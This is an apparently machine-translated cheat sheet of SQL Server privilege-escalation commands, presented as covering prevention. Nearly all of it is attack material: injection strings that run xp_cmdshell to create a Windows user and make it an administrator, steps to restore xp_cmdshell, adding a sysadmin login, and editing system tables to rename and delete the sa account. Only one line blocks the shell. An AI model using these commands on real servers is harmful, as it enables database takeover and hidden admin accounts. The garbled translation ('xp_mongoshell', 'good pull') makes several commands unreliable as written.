Commands related to SQL server privilege escalation and Prevention Measures
; Exec master.. xp_cmdshell "Net user name password/Add "--
; Exec master.. xp_cmdshell "net localgroup administrators name/Add "--
ProgramCodeEnable the SQL statement of Shell
Exec sp_addextendedproc xp_cmdshell, @ dllname = 'loglog70. dll'
Determine whether the storage extension exists
Select count (*) from Master. DBO. sysobjects where xtype = 'X' and name = 'xp _ cmdshell'
If the returned result is 1, OK is returned.
Restore xp_mongoshell
Exec master. DBO. addextendedproc 'xp _ Your shell', 'xp log70. dll '; select count (*) from master. DBO. sysobjects where xtype = 'X' and name = 'xp _ Your shell'
If the returned result is 1, OK is returned.
Otherwise, upload xplog7.0.dll.
Exec master. DBO. addextendedproc 'xp _ mongoshell', 'c:/winnt/system32/xplog70.dll'
Block SQL statements of Shell
Sp_dropextendedproc "xp_cmdshell"
DoS:
Dir C :/
Dir D :/
Dir E :/
Net user tsinternetusers password/Add
Net localgroup administrators tsinternetusers/Add
Backup and recovery IPSec
SeCEdit/export/cfg c:/tmp. inf
Echo sedenynetworklogonright => C:/tmp. inf
SeCEdit/configure/db c:/Windows/SeCEdit. sdb/cfg c:/tmp. inf
SQL:
Exec master .. sp_addlogin username, password
Exec master .. SP_ADDSRVROLEMEMBER username, SysAdmin
Sa account name and Deletion
First open the Enterprise Manager in SQL, select SQL Server Configuration attributes in the Tools tab, and click server settings. Can you directly modify the front box of the system directory, click, okay.
Open the query analyzer and log on to the analyzer (haha, whatever account you use, but you must have the db_owner permission in the master database ).
Update sysxlogins set name = 'the name you want to change to 'where SID = 0x01
Update sysxlogins set SID = 0xe765555bd44f054f89cd0076a06ea823 where name = 'name you want to change to name'
OK, the execution is successful, good pull, switch to the Enterprise Manager and refresh the login in security to see if SA is changed to xwq pull. Haha, right-click xwq and choose whether to show the option of pulling and deleting, delete. Check if SA has not been pulled.
Postscript
How to delete SA directly in the query Analyzer
The method of deleting SA directly in the query analyzer is similar to that mentioned above, but this time it is not in the Enterprise Manager, instead, SQL provides us with powerful stored procedures to complete this task. The following describes the Stored Procedure sp_configure and sp_configure to be used to display or change the global configuration settings of the current server.
Its Syntax:
Sp_configure [[@ configname =] 'name']
[, [@ Configvalue =] 'value']
Instance:
Sp_configure 'Allow updates', 1
Go
Reconfigure with override
Go
Good pull, so that we can update the system table pull. Next we will pull the update sysxlogins set name = 'you want to change to the name 'where SID = 0x01, then Delete "the name you renamed"
However, note that the execution permission without parameters (or only the first parameter) on sp_configure is granted to all users by default. Execution permission of sp_configure with two parameters (used to change configuration options) is granted to SysAdmin and serveradmin fixed server roles by default. Reconfigure permissions are granted by default to SysAdmin fixed server roles and serveradmin fixed server roles, and cannot be transferred. It must also be db_owner in the master.